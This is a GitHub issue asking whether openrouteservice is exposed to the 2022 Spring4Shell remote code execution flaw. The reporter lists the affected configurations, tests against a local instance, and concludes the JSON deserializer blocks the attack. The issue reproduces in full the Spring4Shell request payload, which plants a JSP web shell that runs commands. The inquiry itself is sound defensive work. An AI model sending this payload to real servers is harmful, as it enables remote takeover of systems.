openrouteservice icon indicating copy to clipboard operation
openrouteservice copied to clipboard

Published 20 hours ago verified publisher icon GIScience

Spring Shell RCE inquiry

Open TheDropZone opened this issue 2 years ago • 0 comments

https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/#applying-mitigations

Spring has announced an RCE affecting spring projects with the following stats:

  • JDK 9 or higher
  • Apache Tomcat as the Servlet container
  • Packaged as a traditional WAR (in contrast to a Spring Boot executable jar)
  • spring-webmvc or spring-webflux dependency
  • Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions

Upon checking, through my docker deployment (with :latest), it seems that openrouteservice may by ticking all (or at least a lot) of these boxes. Because of this, I attempted an exploit against my local instance via

POST http://localhost:8082/ors/v2/directions/driving-car
{
    "class.module.classLoader.resources.context.parent.pipeline.first.pattern": "%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di",
    "class.module.classLoader.resources.context.parent.pipeline.first.suffix": ".jsp",
    "class.module.classLoader.resources.context.parent.pipeline.first.directory": "webapps/ROOT",
    "class.module.classLoader.resources.context.parent.pipeline.first.prefix": "shell",
    "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat": "",
    "coordinates": [[-82.590945,35.569088],[-82.539167,35.565559]]
}

In line with identified RCEs: https://github.com/TheGejr/SpringShell/blob/master/exp.py It does not seem as though the RCE is successful, given that "class.module.classLoader.resources.context.parent.pipeline.first.pattern" fields are not found.

I also ran the tomcat deployment in debug mode and traced the POST request, but it does not seem that the JSON de-serializer would ever allow for this type of access as 'AbstractJackson2HttpMessageConverter' simply states that the 'RouteRequest" object does not contain that field.

This leads me to believe that the vulnerability is not valid for the openrouteservice project, however, I wanted to bring it up for further investigation.

Resolution

The Official Sprint post listed above does not a found solutions, around versions and disabling fields, if in fact the project is vulnerable

Thanks

TheDropZone avatar Mar 31 '22 17:03 TheDropZone